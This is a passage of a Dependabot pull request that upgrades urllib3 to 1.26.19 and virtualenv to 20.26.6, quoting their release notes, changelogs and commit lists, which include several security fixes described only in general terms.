href=\"https://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\"\u003ehttps://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eNote that due to an issue with our release automation, no \u003ccode\u003e multiple.intoto.jsonl\u003c/code\u003e file is available for this release.\u003c/p\u003e\n\u003ch2\u003e1.26.18\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses. (GHSA-g4mx-q9vg-27p4)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (GHSA-v845-jxx5-vc9f)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins would cause connection pools to be closed while requests are in progress (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2954\"\u003e#2954\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when HTTPConnection is reused (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2645\"\u003eurllib3/urllib3#2645\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2899\"\u003eurllib3/urllib3#2899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of 'x80' byte (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2901\"\u003eurllib3/urllib3#2901\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2850\"\u003e#2850\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e calls in \u003ccode\u003eurllib3.contrib\u003c/code\u003e module.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected even when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module. Both will be removed in v2.x. See this \u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2680\"\u003eGitHub issue\u003c/a\u003e for justification and info on how to migrate.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.11\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eIf you or your organization rely on urllib3 consider supporting us via \u003ca href=\"https://github.com/sponsors/urllib3\"\u003eGitHub Sponsors\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003e:warning: \u003cstrong\u003eurllib3 v2.0 will drop support for Python 2\u003c/strong\u003e: \u003ca href=\"https://urllib3.readthedocs.io/en/latest/v2-roadmap.html\"\u003eRead more in the v2.0 Roadmap\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed an issue where reading more than 2 GiB in a call to HTTPResponse.read would raise an OverflowError on Python 3.9 and earlier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.26.19 (2024-06-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eFixed handling of OpenSSL 3.2.0 new error message for misconfiguring an HTTP proxy as HTTPS. (\u003ccode\u003e[#3405](https://github.com/urllib3/urllib3/issues/3405) \u0026lt;https://github.com/urllib3/urllib3/issues/3405\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.18 (2023-10-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.17 (2023-10-02)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (\u003ccode\u003e[#3139](https://github.com/urllib3/urllib3/issues/3139) \u0026lt;https://github.com/urllib3/urllib3/pull/3139\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.16 (2023-05-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins\nwould cause connection pools to be closed while requests are in progress (\u003ccode\u003e[#2954](https://github.com/urllib3/urllib3/issues/2954) \u0026lt;https://github.com/urllib3/urllib3/pull/2954\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.15 (2023-03-10)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when \u003ccode\u003eHTTPConnection\u003c/code\u003e is reused (\u003ccode\u003e[#2645](https://github.com/urllib3/urllib3/issues/2645) \u0026lt;https://github.com/urllib3/urllib3/issues/2645\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing\n(\u003ccode\u003e[#2899](https://github.com/urllib3/urllib3/issues/2899) \u0026lt;https://github.com/urllib3/urllib3/issues/2899\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of '\\x80' byte (\u003ccode\u003e[#2901](https://github.com/urllib3/urllib3/issues/2901) \u0026lt;https://github.com/urllib3/urllib3/issues/2901\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.14 (2023-01-11)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0. (\u003ccode\u003e[#2850](https://github.com/urllib3/urllib3/issues/2850) \u0026lt;https://github.com/urllib3/urllib3/issues/2850\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated getheaders() calls in contrib module. Fixed the type hint of \u003ccode\u003ePoolKey.key_retries\u003c/code\u003e by adding \u003ccode\u003ebool\u003c/code\u003e to the union. (\u003ccode\u003e[#2865](https://github.com/urllib3/urllib3/issues/2865) \u0026lt;https://github.com/urllib3/urllib3/issues/2865\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.13 (2022-11-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected\neven when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.12 (2022-08-22)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module.\nBoth will be removed in v2.x. See this \u003ccode\u003eGitHub issue \u0026lt;https://github.com/urllib3/urllib3/issues/2680\u0026gt;\u003c/code\u003e_\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d9d85c88aa644af56d5e129634e750ce76e1a765\"\u003e\u003ccode\u003ed9d85c8\u003c/code\u003e\u003c/a\u003e Release 1.26.19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8528b63b6fe5cfd7b21942cf988670de68fcd8c0\"\u003e\u003ccode\u003e8528b63\u003c/code\u003e\u003c/a\u003e [1.26] Fix downstream tests (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3409\"\u003e#3409\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/40b6d1605814dd1db0a46e202d6e56f2e4c9a468\"\u003e\u003ccode\u003e40b6d16\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-34jh-p97f-mpxf\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/29cfd02f66376c61bd20f1725477925106321f68\"\u003e\u003ccode\u003e29cfd02\u003c/code\u003e\u003c/a\u003e Fix handling of OpenSSL 3.2.0 new error message \u0026quot;record layer failure\u0026quot; (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3405\"\u003e#3405\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b60064388302f54a3455259ddab121618650a154\"\u003e\u003ccode\u003eb600643\u003c/code\u003e\u003c/a\u003e [1.26] Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3404\"\u003e#3404\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7e2d3890926d4788e219f63e2e36fbeb8714827f\"\u003e\u003ccode\u003e7e2d389\u003c/code\u003e\u003c/a\u003e [1.26] Fix running CPython 2.7 tests in CI (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3137\"\u003e#3137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9c2c2307dd1d6af504e09aac0326d86ee3597a0b\"\u003e\u003ccode\u003e9c2c230\u003c/code\u003e\u003c/a\u003e Release 1.26.18 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3159\"\u003e#3159\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36\"\u003e\u003ccode\u003eb594c5c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-g4mx-q9vg-27p4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/944f0eb134485f41bc531be52de12ba5a37bca73\"\u003e\u003ccode\u003e944f0eb\u003c/code\u003e\u003c/a\u003e [1.26] Use vendored six in urllib3.contrib.securetransport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c9016bf464751a02b7e46f8b86504f47d4238784\"\u003e\u003ccode\u003ec9016bf\u003c/code\u003e\u003c/a\u003e Release 1.26.17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.4...1.26.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `virtualenv` from 20.4.2 to 20.26.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/releases\"\u003evirtualenv's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e20.26.6\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.5 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2766\"\u003epypa/virtualenv#2766\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts by \u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.5\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.4 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2761\"\u003epypa/virtualenv#2761\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse uv over pip by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2765\"\u003epypa/virtualenv#2765\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.3 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2742\"\u003epypa/virtualenv#2742\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix whitespace around backticks in changelog by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2751\"\u003epypa/virtualenv#2751\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTest latest Python 3.13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2752\"\u003epypa/virtualenv#2752\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix typo in Nushell activation script by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2754\"\u003epypa/virtualenv#2754\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGitHub Actions: Replace deprecated macos-12 with macos-13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2756\"\u003epypa/virtualenv#2756\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2728\"\u003e#2728\u003c/a\u003e: Activating venv create unwanted console output  by \u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade bundled wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2760\"\u003epypa/virtualenv#2760\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.2 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2724\"\u003epypa/virtualenv#2724\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump embeded wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2741\"\u003epypa/virtualenv#2741\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/blob/main/docs/changelog.rst\"\u003evirtualenv's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev20.26.6 (2024-09-27)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.6\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- Properly quote string placeholders in activation script templates to mitigate\n  potential command injection - by :user:`y5c4l3`. (:issue:`2768`)\n\u003ch2\u003ev20.26.5 (2024-09-17)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.5\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade embedded wheels: setuptools to \u003ccode\u003e75.1.0\u003c/code\u003e from \u003ccode\u003e74.1.2\u003c/code\u003e - by :user:\u003ccode\u003egaborbernat\u003c/code\u003e. (:issue:\u003ccode\u003e2765\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.4 (2024-09-07)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.4\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- no longer create `()` output in console during activation of a virtualenv by .bat file. (:issue:`2728`)\n- Upgrade embedded wheels:\n\u003cul\u003e\n\u003cli\u003ewheel to \u003ccode\u003e0.44.0\u003c/code\u003e from \u003ccode\u003e0.43.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.2\u003c/code\u003e from \u003ccode\u003e24.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e74.1.2\u003c/code\u003e from \u003ccode\u003e70.1.0\u003c/code\u003e (:issue:\u003ccode\u003e2760\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.3 (2024-06-21)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.3\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eUpgrade embedded wheels:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e70.1.0\u003c/code\u003e from \u003ccode\u003e69.5.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.1\u003c/code\u003e from \u003ccode\u003e24.0\u003c/code\u003e (:issue:\u003ccode\u003e2741\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.2 (2024-05-13)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.2\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- ``virtualenv.pyz`` no longer fails when zipapp path contains a symlink - by :user:`HandSonic` and :user:`petamas`. (:issue:`1949`)\n- Fix bad return code from activate.sh if hashing is disabled - by :user:'fenkes-ibm'. (:issue:`2717`)\n\u003ch2\u003ev20.26.1 (2024-04-29)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.1\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ec04726d065372ffad9920998aef1ce41252a61d\"\u003e\u003ccode\u003eec04726\u003c/code\u003e\u003c/a\u003e release 20.26.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/86dddeda7c991f8529e1995bbff280fb7b761972\"\u003e\u003ccode\u003e86ddded\u003c/code\u003e\u003c/a\u003e Fix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2771\"\u003e#2771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/6bb3f6226c18d69bb6cfa3475b6d46dd463bb530\"\u003e\u003ccode\u003e6bb3f62\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2769\"\u003e#2769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/220d49c2e3ade2ed24f5712ab5a23895cde2e04c\"\u003e\u003ccode\u003e220d49c\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.10.1 to 1.10.2 (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2767\"\u003e#2767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/cf340c83c2828a92def78c77b3e037a2baa4d557\"\u003e\u003ccode\u003ecf340c8\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2766\"\u003e#2766\u003c/a\u003e from pypa/release-20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/f3172b4da576b88275a14d2e7bbeb98b8f958a05\"\u003e\u003ccode\u003ef3172b4\u003c/code\u003e\u003c/a\u003e release 20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/22b9795eb6bed0c17d0415c5513eca099a0a11ad\"\u003e\u003ccode\u003e22b9795\u003c/code\u003e\u003c/a\u003e Use uv over pip (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2765\"\u003e#2765\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/35d8269aba12a1e3c60183a2082b2c4d0cc1192f\"\u003e\u003ccode\u003e35d8269\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2764\"\u003e#2764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ee77feb77ccb3c5deefa318630c59315bcfda521\"\u003e\u003ccode\u003eee77feb\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2763\"\u003e#2763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/c5160566293ed098ca30e0856dbf44588dd5c3a3\"\u003e\u003ccode\u003ec516056\u003c/code\u003e\u003c/a\u003e Update README.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.4.2...20.26.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific 